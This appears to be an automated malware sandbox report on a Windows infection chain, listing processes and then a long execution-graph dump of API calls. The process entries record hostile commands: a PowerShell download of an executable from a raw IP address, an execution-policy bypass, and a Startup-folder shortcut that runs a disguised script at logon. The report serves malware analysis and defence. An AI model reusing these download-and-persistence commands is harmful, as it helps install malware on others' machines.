                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:14:55:37
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:14:55:46
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:20
                                                                                        Start time:14:55:46
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:21
                                                                                        Start time:14:55:52
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Users\Public\Guard.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                        Imagebase:0xa20000
                                                                                        File size:893'608 bytes
                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 8%, ReversingLabs
                                                                                        Has exited:false

                                                                                        Target ID:22
                                                                                        Start time:14:55:55
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                        Imagebase:0x410000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:23
                                                                                        Start time:14:55:55
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:24
                                                                                        Start time:14:56:06
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                        Imagebase:0x7ff6779f0000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:27
                                                                                        Start time:14:56:10
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                        Imagebase:0xf10000
                                                                                        File size:893'608 bytes
                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 8%, ReversingLabs
                                                                                        Has exited:false


                                                                                          Execution Graph

                                                                                          Execution Coverage:2.4%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:5.9%
                                                                                          Total number of Nodes:1427
                                                                                          Total number of Limit Nodes:40
7ff74d06ba10 _isindst LeaveCriticalSection 94330->94331 94332 7ff74d03376e 94331->94332 94333 7ff74d059334 94332->94333 94334 7ff74d05933d 94333->94334 94335 7ff74d033778 94333->94335 94387 7ff74d0655d4 15 API calls abort 94334->94387 94339 7ff74d0336e8 SystemParametersInfoW SystemParametersInfoW 94335->94339 94337 7ff74d059342 94388 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94337->94388 94339->94036 94341 7ff74d0337cd wcsftime 94340->94341 94342 7ff74d039640 4 API calls 94341->94342 94343 7ff74d0337dd GetCurrentDirectoryW 94342->94343 94389 7ff74d0357a0 94343->94389 94345 7ff74d033807 IsDebuggerPresent 94346 7ff74d07b872 MessageBoxA 94345->94346 94347 7ff74d033815 94345->94347 94348 7ff74d07b894 94346->94348 94347->94348 94349 7ff74d033839 94347->94349 94499 7ff74d03e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94348->94499 94463 7ff74d033f04 94349->94463 94353 7ff74d033860 GetFullPathNameW 94354 7ff74d037cf4 4 API calls 94353->94354 94355 7ff74d0338a6 94354->94355 94479 7ff74d033f9c 94355->94479 94356 7ff74d0338bf 94358 7ff74d07b8dc SetCurrentDirectoryW 94356->94358 94359 7ff74d0338c7 94356->94359 94358->94359 94360 7ff74d0338d0 94359->94360 94500 7ff74d09d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 94359->94500 94495 7ff74d033b84 7 API calls 94360->94495 94363 7ff74d07b8f8 94363->94360 94366 7ff74d07b90c 94363->94366 94368 7ff74d035680 6 API calls 94366->94368 94367 7ff74d0338da 94370 7ff74d036258 46 API calls 94367->94370 94373 7ff74d0338ef 94367->94373 94369 7ff74d07b916 94368->94369 94371 7ff74d03ec00 4 API calls 94369->94371 94370->94373 94372 7ff74d07b927 94371->94372 94375 7ff74d07b94d 94372->94375 94376 7ff74d07b930 94372->94376 94374 7ff74d033913 94373->94374 94377 7ff74d035d88 Shell_NotifyIconW 94373->94377 94379 7ff74d03391f SetCurrentDirectoryW 94374->94379 94381 7ff74d0371f8 4 API calls 94375->94381 94378 7ff74d0371f8 4 API calls 94376->94378 94377->94374 94380 7ff74d07b93c 94378->94380 94382 
7ff74d033934 Concurrency::wait 94379->94382 94501 7ff74d037c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94380->94501 94384 7ff74d07b963 GetForegroundWindow ShellExecuteW 94381->94384 94382->94038 94385 7ff74d07b99f Concurrency::wait 94384->94385 94385->94374 94387->94337 94388->94335 94390 7ff74d039640 4 API calls 94389->94390 94391 7ff74d0357d7 94390->94391 94502 7ff74d039bbc 94391->94502 94393 7ff74d0357fe 94394 7ff74d035680 6 API calls 94393->94394 94395 7ff74d035812 94394->94395 94396 7ff74d03ec00 4 API calls 94395->94396 94397 7ff74d035823 94396->94397 94516 7ff74d036460 94397->94516 94400 7ff74d07c05e 94589 7ff74d0b2948 94400->94589 94401 7ff74d03584e Concurrency::wait 94405 7ff74d03e0a8 4 API calls 94401->94405 94403 7ff74d07c074 94404 7ff74d07c081 94403->94404 94406 7ff74d03652c 63 API calls 94403->94406 94607 7ff74d03652c 94404->94607 94407 7ff74d03586a 94405->94407 94406->94404 94409 7ff74d03ec00 4 API calls 94407->94409 94410 7ff74d035888 94409->94410 94414 7ff74d07c099 94410->94414 94542 7ff74d03eff8 94410->94542 94412 7ff74d0358ad Concurrency::wait 94413 7ff74d03ec00 4 API calls 94412->94413 94415 7ff74d0358d7 94413->94415 94417 7ff74d035ab4 4 API calls 94414->94417 94415->94414 94416 7ff74d03eff8 46 API calls 94415->94416 94419 7ff74d0358fc Concurrency::wait 94416->94419 94418 7ff74d07c0e1 94417->94418 94420 7ff74d035ab4 4 API calls 94418->94420 94422 7ff74d039640 4 API calls 94419->94422 94421 7ff74d07c103 94420->94421 94425 7ff74d035680 6 API calls 94421->94425 94423 7ff74d03591f 94422->94423 94555 7ff74d035ab4 94423->94555 94428 7ff74d07c12b 94425->94428 94430 7ff74d035ab4 4 API calls 94428->94430 94429 7ff74d035941 94429->94414 94432 7ff74d035949 94429->94432 94431 7ff74d07c139 94430->94431 94433 7ff74d03e0a8 4 API calls 94431->94433 94434 7ff74d058e28 wcsftime 37 API calls 94432->94434 94435 7ff74d07c14a 94433->94435 94436 7ff74d035958 94434->94436 94437 7ff74d035ab4 4 API calls 94435->94437 
94436->94418 94438 7ff74d035960 94436->94438 94439 7ff74d07c15b 94437->94439 94440 7ff74d058e28 wcsftime 37 API calls 94438->94440 94443 7ff74d03e0a8 4 API calls 94439->94443 94441 7ff74d03596f 94440->94441 94441->94421 94442 7ff74d035977 94441->94442 94444 7ff74d058e28 wcsftime 37 API calls 94442->94444 94445 7ff74d07c172 94443->94445 94446 7ff74d035986 94444->94446 94447 7ff74d035ab4 4 API calls 94445->94447 94448 7ff74d0359c6 94446->94448 94451 7ff74d035ab4 4 API calls 94446->94451 94450 7ff74d07c183 94447->94450 94448->94439 94449 7ff74d0359d3 94448->94449 94578 7ff74d03df90 94449->94578 94452 7ff74d0359a8 94451->94452 94453 7ff74d03e0a8 4 API calls 94452->94453 94455 7ff74d0359b5 94453->94455 94456 7ff74d035ab4 4 API calls 94455->94456 94456->94448 94459 7ff74d035a12 94460 7ff74d03d670 5 API calls 94459->94460 94461 7ff74d035ab4 4 API calls 94459->94461 94462 7ff74d035a60 Concurrency::wait 94459->94462 94460->94459 94461->94459 94462->94345 94464 7ff74d033f29 wcsftime 94463->94464 94465 7ff74d033f4b 94464->94465 94466 7ff74d07ba2c __scrt_get_show_window_mode 94464->94466 94467 7ff74d0356d4 5 API calls 94465->94467 94468 7ff74d07ba4d GetOpenFileNameW 94466->94468 94469 7ff74d033f56 94467->94469 94470 7ff74d033858 94468->94470 94471 7ff74d07bab0 94468->94471 94951 7ff74d033eb4 94469->94951 94470->94353 94470->94356 94473 7ff74d037cf4 4 API calls 94471->94473 94475 7ff74d07babc 94473->94475 94477 7ff74d033f6c 94969 7ff74d036394 94477->94969 94480 7ff74d033fb6 wcsftime 94479->94480 95012 7ff74d039734 94480->95012 94482 7ff74d033fc4 94494 7ff74d034050 94482->94494 95022 7ff74d034d28 77 API calls 94482->95022 94484 7ff74d033fd3 94484->94494 95023 7ff74d034b0c 79 API calls Concurrency::wait 94484->95023 94486 7ff74d033fe0 94487 7ff74d033fe8 GetFullPathNameW 94486->94487 94486->94494 94488 7ff74d037cf4 4 API calls 94487->94488 94489 7ff74d034014 94488->94489 94490 7ff74d037cf4 4 API calls 94489->94490 94491 7ff74d034028 94490->94491 94492 7ff74d07bac2 wcscat 
94491->94492 94493 7ff74d037cf4 4 API calls 94491->94493 94493->94494 94494->94356 95027 7ff74d033d90 7 API calls 94495->95027 94497 7ff74d0338d5 94498 7ff74d033cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94497->94498 94499->94356 94500->94363 94501->94375 94503 7ff74d039be5 wcsftime 94502->94503 94504 7ff74d037cf4 4 API calls 94503->94504 94505 7ff74d039c1b 94503->94505 94504->94505 94515 7ff74d039c4a Concurrency::wait 94505->94515 94613 7ff74d039d84 94505->94613 94507 7ff74d03ec00 4 API calls 94508 7ff74d039d4a 94507->94508 94510 7ff74d034680 4 API calls 94508->94510 94509 7ff74d03ec00 4 API calls 94509->94515 94511 7ff74d039d57 Concurrency::wait 94510->94511 94511->94393 94512 7ff74d034680 4 API calls 94512->94515 94513 7ff74d039d21 94513->94507 94513->94511 94514 7ff74d039d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94514->94515 94515->94509 94515->94512 94515->94513 94515->94514 94616 7ff74d036d64 94516->94616 94519 7ff74d03649d 94520 7ff74d0364ba FreeLibrary 94519->94520 94521 7ff74d0364c0 94519->94521 94520->94521 94620 7ff74d0648e0 94521->94620 94522 7ff74d036d64 2 API calls 94522->94519 94525 7ff74d0364db LoadLibraryExW 94639 7ff74d036cc4 94525->94639 94526 7ff74d07c8f6 94528 7ff74d03652c 63 API calls 94526->94528 94529 7ff74d07c8fe 94528->94529 94531 7ff74d036cc4 3 API calls 94529->94531 94535 7ff74d07c907 94531->94535 94533 7ff74d036505 94534 7ff74d036512 94533->94534 94533->94535 94537 7ff74d03652c 63 API calls 94534->94537 94661 7ff74d0367d8 94535->94661 94539 7ff74d035846 94537->94539 94539->94400 94539->94401 94541 7ff74d07c93f 94864 7ff74d041a30 94542->94864 94544 7ff74d03f029 94545 7ff74d08a7a8 94544->94545 94546 7ff74d03f040 94544->94546 94880 7ff74d03ee20 5 API calls Concurrency::wait 94545->94880 94549 7ff74d054c68 4 API calls 94546->94549 94548 7ff74d08a7bc 94550 7ff74d03f066 94549->94550 94552 7ff74d03f08f 94550->94552 94879 7ff74d03f0ec RtlPcToFileHeader RaiseException EnterCriticalSection 
LeaveCriticalSection memcpy_s 94550->94879 94875 7ff74d03f1bc 94552->94875 94554 7ff74d03f0c6 94554->94412 94556 7ff74d035ac6 94555->94556 94557 7ff74d035ae4 94555->94557 94558 7ff74d03e0a8 4 API calls 94556->94558 94559 7ff74d037cf4 4 API calls 94557->94559 94560 7ff74d03592d 94558->94560 94559->94560 94561 7ff74d058e28 94560->94561 94562 7ff74d058ea4 94561->94562 94563 7ff74d058e3f 94561->94563 94884 7ff74d058d98 35 API calls 2 library calls 94562->94884 94570 7ff74d058e63 94563->94570 94882 7ff74d0655d4 15 API calls abort 94563->94882 94566 7ff74d058ed6 94568 7ff74d058ee2 94566->94568 94576 7ff74d058ef9 94566->94576 94567 7ff74d058e49 94883 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94567->94883 94885 7ff74d0655d4 15 API calls abort 94568->94885 94570->94429 94572 7ff74d058e54 94572->94429 94573 7ff74d058ee7 94886 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94573->94886 94575 7ff74d062c80 37 API calls wcsftime 94575->94576 94576->94575 94577 7ff74d058ef2 94576->94577 94577->94429 94579 7ff74d03dfac 94578->94579 94580 7ff74d054c68 4 API calls 94579->94580 94581 7ff74d0359f5 94579->94581 94580->94581 94582 7ff74d03d670 94581->94582 94583 7ff74d03d698 94582->94583 94587 7ff74d03d6a2 94583->94587 94887 7ff74d03880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94583->94887 94586 7ff74d089d43 94588 7ff74d03d7de 94587->94588 94888 7ff74d03ee20 5 API calls Concurrency::wait 94587->94888 94588->94459 94590 7ff74d0b29c8 94589->94590 94889 7ff74d0b2b70 94590->94889 94593 7ff74d0367d8 45 API calls 94594 7ff74d0b2a03 94593->94594 94595 7ff74d0367d8 45 API calls 94594->94595 94596 7ff74d0b2a23 94595->94596 94597 7ff74d0367d8 45 API calls 94596->94597 94598 7ff74d0b2a49 94597->94598 94599 7ff74d0367d8 45 API calls 94598->94599 94600 7ff74d0b2a6d 94599->94600 94601 7ff74d0367d8 45 API calls 94600->94601 94602 7ff74d0b2ac5 94601->94602 94603 7ff74d0b240c 32 API calls 94602->94603 94604 7ff74d0b2ada 94603->94604 94606 7ff74d0b29de 
94604->94606 94894 7ff74d0b1d48 94604->94894 94606->94403 94608 7ff74d03653d 94607->94608 94609 7ff74d036542 94607->94609 94610 7ff74d064970 62 API calls 94608->94610 94611 7ff74d036558 94609->94611 94612 7ff74d03656f FreeLibrary 94609->94612 94610->94609 94611->94414 94612->94611 94614 7ff74d03a7c0 4 API calls 94613->94614 94615 7ff74d039d99 94614->94615 94615->94505 94617 7ff74d036490 94616->94617 94618 7ff74d036d74 LoadLibraryA 94616->94618 94617->94519 94617->94522 94618->94617 94619 7ff74d036d89 GetProcAddress 94618->94619 94619->94617 94621 7ff74d0647fc 94620->94621 94622 7ff74d06482a 94621->94622 94625 7ff74d06485c 94621->94625 94681 7ff74d0655d4 15 API calls abort 94622->94681 94624 7ff74d06482f 94682 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94624->94682 94626 7ff74d06486f 94625->94626 94627 7ff74d064862 94625->94627 94669 7ff74d06feb4 94626->94669 94683 7ff74d0655d4 15 API calls abort 94627->94683 94631 7ff74d0364cf 94631->94525 94631->94526 94633 7ff74d064883 94684 7ff74d0655d4 15 API calls abort 94633->94684 94634 7ff74d064890 94676 7ff74d070304 94634->94676 94637 7ff74d0648a3 94685 7ff74d05df60 LeaveCriticalSection 94637->94685 94823 7ff74d036d1c 94639->94823 94642 7ff74d036cf1 94644 7ff74d036d0f FreeLibrary 94642->94644 94645 7ff74d0364f7 94642->94645 94643 7ff74d036d1c 2 API calls 94643->94642 94644->94645 94646 7ff74d036580 94645->94646 94647 7ff74d054c68 4 API calls 94646->94647 94648 7ff74d0365b5 memcpy_s 94647->94648 94649 7ff74d07c9f5 94648->94649 94650 7ff74d036740 CreateStreamOnHGlobal 94648->94650 94658 7ff74d036602 94648->94658 94827 7ff74d0b2e00 45 API calls 94649->94827 94651 7ff74d036759 FindResourceExW 94650->94651 94650->94658 94651->94658 94653 7ff74d07c97e LoadResource 94654 7ff74d07c997 SizeofResource 94653->94654 94653->94658 94657 7ff74d07c9ae LockResource 94654->94657 94654->94658 94655 7ff74d0367d8 45 API calls 94655->94658 94656 7ff74d07c9fd 94659 7ff74d0367d8 45 API calls 94656->94659 94657->94658 94658->94653 
94658->94655 94658->94656 94660 7ff74d0366e8 94658->94660 94659->94660 94660->94533 94662 7ff74d07ca6c 94661->94662 94663 7ff74d0367f7 94661->94663 94828 7ff74d064c5c 94663->94828 94666 7ff74d0b240c 94847 7ff74d0b2200 94666->94847 94668 7ff74d0b2430 94668->94541 94686 7ff74d06b9bc EnterCriticalSection 94669->94686 94671 7ff74d06fecb 94672 7ff74d06ff54 18 API calls 94671->94672 94673 7ff74d06fed6 94672->94673 94674 7ff74d06ba10 _isindst LeaveCriticalSection 94673->94674 94675 7ff74d064879 94674->94675 94675->94633 94675->94634 94687 7ff74d070040 94676->94687 94678 7ff74d07035e 94678->94637 94681->94624 94682->94631 94683->94631 94684->94631 94692 7ff74d07007d try_get_function 94687->94692 94689 7ff74d0702de 94706 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94689->94706 94691 7ff74d07021a 94691->94678 94699 7ff74d077738 94691->94699 94698 7ff74d070211 94692->94698 94702 7ff74d05db68 37 API calls 4 library calls 94692->94702 94694 7ff74d070277 94694->94698 94703 7ff74d05db68 37 API calls 4 library calls 94694->94703 94696 7ff74d07029a 94696->94698 94704 7ff74d05db68 37 API calls 4 library calls 94696->94704 94698->94691 94705 7ff74d0655d4 15 API calls abort 94698->94705 94707 7ff74d076d04 94699->94707 94702->94694 94703->94696 94704->94698 94705->94689 94706->94691 94708 7ff74d076d28 94707->94708 94712 7ff74d076d40 94707->94712 94761 7ff74d0655d4 15 API calls abort 94708->94761 94710 7ff74d076d2d 94762 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94710->94762 94711 7ff74d076d6d 94718 7ff74d077348 94711->94718 94712->94708 94712->94711 94716 7ff74d076d39 94716->94678 94764 7ff74d077078 94718->94764 94721 7ff74d0773bc 94796 7ff74d0655b4 15 API calls abort 94721->94796 94722 7ff74d0773d3 94784 7ff74d06e418 94722->94784 94725 7ff74d0773c1 94797 7ff74d0655d4 15 API calls abort 94725->94797 94727 7ff74d0773f7 CreateFileW 94729 7ff74d0774eb GetFileType 94727->94729 94730 7ff74d077469 94727->94730 94728 7ff74d0773df 94798 7ff74d0655b4 15 API calls abort 
94728->94798 94734 7ff74d077549 94729->94734 94735 7ff74d0774f8 GetLastError 94729->94735 94733 7ff74d0774b8 GetLastError 94730->94733 94738 7ff74d077478 CreateFileW 94730->94738 94800 7ff74d065564 15 API calls 2 library calls 94733->94800 94803 7ff74d06e334 16 API calls 2 library calls 94734->94803 94801 7ff74d065564 15 API calls 2 library calls 94735->94801 94736 7ff74d0773e4 94799 7ff74d0655d4 15 API calls abort 94736->94799 94738->94729 94738->94733 94741 7ff74d077507 CloseHandle 94741->94725 94743 7ff74d077539 94741->94743 94802 7ff74d0655d4 15 API calls abort 94743->94802 94745 7ff74d077568 94746 7ff74d0775b5 94745->94746 94804 7ff74d077284 67 API calls 2 library calls 94745->94804 94751 7ff74d0775ec 94746->94751 94805 7ff74d076de4 67 API calls 4 library calls 94746->94805 94747 7ff74d07753e 94747->94725 94750 7ff74d0775e8 94750->94751 94752 7ff74d0775fe 94750->94752 94806 7ff74d0704b8 94751->94806 94754 7ff74d076d95 94752->94754 94755 7ff74d077681 CloseHandle CreateFileW 94752->94755 94754->94716 94763 7ff74d06e3f4 LeaveCriticalSection 94754->94763 94756 7ff74d0776f9 94755->94756 94757 7ff74d0776cb GetLastError 94755->94757 94756->94754 94821 7ff74d065564 15 API calls 2 library calls 94757->94821 94759 7ff74d0776d8 94822 7ff74d06e548 16 API calls 2 library calls 94759->94822 94761->94710 94762->94716 94765 7ff74d0770a4 94764->94765 94772 7ff74d0770be 94764->94772 94766 7ff74d0655d4 _set_fmode 15 API calls 94765->94766 94765->94772 94767 7ff74d0770b3 94766->94767 94768 7ff74d06b164 _invalid_parameter_noinfo 31 API calls 94767->94768 94768->94772 94769 7ff74d07718c 94771 7ff74d062554 31 API calls 94769->94771 94782 7ff74d0771ec 94769->94782 94770 7ff74d07713b 94770->94769 94773 7ff74d0655d4 _set_fmode 15 API calls 94770->94773 94774 7ff74d0771e8 94771->94774 94772->94770 94775 7ff74d0655d4 _set_fmode 15 API calls 94772->94775 94776 7ff74d077181 94773->94776 94777 7ff74d07726b 94774->94777 94774->94782 94778 7ff74d077130 94775->94778 94779 7ff74d06b164 
_invalid_parameter_noinfo 31 API calls 94776->94779 94780 7ff74d06b184 _isindst 16 API calls 94777->94780 94781 7ff74d06b164 _invalid_parameter_noinfo 31 API calls 94778->94781 94779->94769 94783 7ff74d077280 94780->94783 94781->94770 94782->94721 94782->94722 94785 7ff74d06b9bc _isindst EnterCriticalSection 94784->94785 94793 7ff74d06e43b 94785->94793 94786 7ff74d06e487 94788 7ff74d06ba10 _isindst LeaveCriticalSection 94786->94788 94787 7ff74d06e464 94789 7ff74d06e170 16 API calls 94787->94789 94790 7ff74d06e52a 94788->94790 94791 7ff74d06e469 94789->94791 94790->94727 94790->94728 94791->94786 94795 7ff74d06e310 wprintf EnterCriticalSection 94791->94795 94792 7ff74d06e4c2 EnterCriticalSection 94792->94786 94794 7ff74d06e4d1 LeaveCriticalSection 94792->94794 94793->94786 94793->94787 94793->94792 94794->94793 94795->94786 94796->94725 94797->94754 94798->94736 94799->94725 94800->94725 94801->94741 94802->94747 94803->94745 94804->94746 94805->94750 94807 7ff74d06e604 31 API calls 94806->94807 94809 7ff74d0704cc 94807->94809 94808 7ff74d0704d2 94810 7ff74d06e548 16 API calls 94808->94810 94809->94808 94811 7ff74d07050c 94809->94811 94812 7ff74d06e604 31 API calls 94809->94812 94814 7ff74d070534 94810->94814 94811->94808 94813 7ff74d06e604 31 API calls 94811->94813 94815 7ff74d0704ff 94812->94815 94816 7ff74d070518 CloseHandle 94813->94816 94817 7ff74d070560 94814->94817 94820 7ff74d065564 fread_s 15 API calls 94814->94820 94818 7ff74d06e604 31 API calls 94815->94818 94816->94808 94819 7ff74d070525 GetLastError 94816->94819 94817->94754 94818->94811 94819->94808 94820->94817 94821->94759 94822->94756 94824 7ff74d036d2c LoadLibraryA 94823->94824 94825 7ff74d036ce3 94823->94825 94824->94825 94826 7ff74d036d41 GetProcAddress 94824->94826 94825->94642 94825->94643 94826->94825 94827->94656 94831 7ff74d064c7c 94828->94831 94832 7ff74d064ca6 94831->94832 94833 7ff74d03680a 94831->94833 94832->94833 94834 7ff74d064cd7 94832->94834 94835 7ff74d064cb5 
__scrt_get_show_window_mode 94832->94835 94833->94666 94846 7ff74d05df54 EnterCriticalSection 94834->94846 94844 7ff74d0655d4 15 API calls abort 94835->94844 94840 7ff74d064cca 94845 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94840->94845 94844->94840 94845->94833 94850 7ff74d0647bc 94847->94850 94849 7ff74d0b2210 94849->94668 94853 7ff74d064724 94850->94853 94854 7ff74d064746 94853->94854 94855 7ff74d064732 94853->94855 94858 7ff74d064742 94854->94858 94863 7ff74d06bef8 6 API calls __vcrt_uninitialize_ptd 94854->94863 94861 7ff74d0655d4 15 API calls abort 94855->94861 94857 7ff74d064737 94862 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94857->94862 94858->94849 94861->94857 94862->94858 94863->94858 94865 7ff74d041a48 94864->94865 94866 7ff74d041c5f 94864->94866 94871 7ff74d041a90 94865->94871 94881 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94865->94881 94866->94544 94871->94544 94876 7ff74d03f1ce 94875->94876 94878 7ff74d03f1d8 94875->94878 94877 7ff74d041a30 45 API calls 94876->94877 94877->94878 94878->94554 94879->94552 94880->94548 94882->94567 94883->94572 94884->94566 94885->94573 94886->94577 94887->94587 94888->94586 94890 7ff74d0b2bae 94889->94890 94891 7ff74d0367d8 45 API calls 94890->94891 94892 7ff74d0b240c 32 API calls 94890->94892 94893 7ff74d0b29da 94890->94893 94891->94890 94892->94890 94893->94593 94893->94606 94895 7ff74d0b1d61 94894->94895 94896 7ff74d0b1d71 94894->94896 94897 7ff74d0648e0 89 API calls 94895->94897 94898 7ff74d0b1dbf 94896->94898 94899 7ff74d0648e0 89 API calls 94896->94899 94904 7ff74d0b1d7a 94896->94904 94897->94896 94921 7ff74d0b2038 94898->94921 94900 7ff74d0b1d9e 94899->94900 94900->94898 94903 7ff74d0b1da7 94900->94903 94902 7ff74d0b1df5 94905 7ff74d0b1df9 94902->94905 94906 7ff74d0b1e1c 94902->94906 94903->94904 94933 7ff74d064970 94903->94933 94904->94606 94908 7ff74d0b1e07 94905->94908 94909 7ff74d064970 62 API calls 
94905->94909 94911 7ff74d0b1e4a 94906->94911 94912 7ff74d0b1e2a 94906->94912 94908->94904 94910 7ff74d064970 62 API calls 94908->94910 94909->94908 94910->94904 94925 7ff74d0b1e88 94911->94925 94913 7ff74d0b1e38 94912->94913 94915 7ff74d064970 62 API calls 94912->94915 94913->94904 94916 7ff74d064970 62 API calls 94913->94916 94915->94913 94916->94904 94917 7ff74d0b1e52 94918 7ff74d0b1e68 94917->94918 94919 7ff74d064970 62 API calls 94917->94919 94918->94904 94920 7ff74d064970 62 API calls 94918->94920 94919->94918 94920->94904 94922 7ff74d0b2069 94921->94922 94924 7ff74d0b2056 memcpy_s 94921->94924 94923 7ff74d064c5c _fread_nolock 45 API calls 94922->94923 94923->94924 94924->94902 94926 7ff74d0b1fb0 94925->94926 94929 7ff74d0b1eaa 94925->94929 94930 7ff74d0b1fd3 94926->94930 94947 7ff74d062a04 60 API calls 2 library calls 94926->94947 94927 7ff74d0b1bd0 45 API calls 94927->94929 94929->94926 94929->94927 94929->94930 94945 7ff74d0b1c9c 45 API calls 94929->94945 94946 7ff74d0b20cc 60 API calls 94929->94946 94930->94917 94934 7ff74d06498e 94933->94934 94935 7ff74d0649a3 94933->94935 94949 7ff74d0655d4 15 API calls abort 94934->94949 94944 7ff74d06499e 94935->94944 94948 7ff74d05df54 EnterCriticalSection 94935->94948 94937 7ff74d064993 94950 7ff74d06b164 31 API calls _invalid_parameter_noinfo 94937->94950 94939 7ff74d0649b9 94941 7ff74d0648ec 60 API calls 94939->94941 94942 7ff74d0649c2 94941->94942 94943 7ff74d05df60 fflush LeaveCriticalSection 94942->94943 94943->94944 94944->94904 94945->94929 94946->94929 94947->94930 94949->94937 94950->94944 94952 7ff74d078f90 wcsftime 94951->94952 94953 7ff74d033ec4 GetLongPathNameW 94952->94953 94954 7ff74d037cf4 4 API calls 94953->94954 94955 7ff74d033eed 94954->94955 94956 7ff74d034074 94955->94956 94957 7ff74d039640 4 API calls 94956->94957 94958 7ff74d03408e 94957->94958 94959 7ff74d0356d4 5 API calls 94958->94959 94960 7ff74d03409b 94959->94960 94961 7ff74d0340a7 94960->94961 94966 7ff74d07bada 94960->94966 94962 
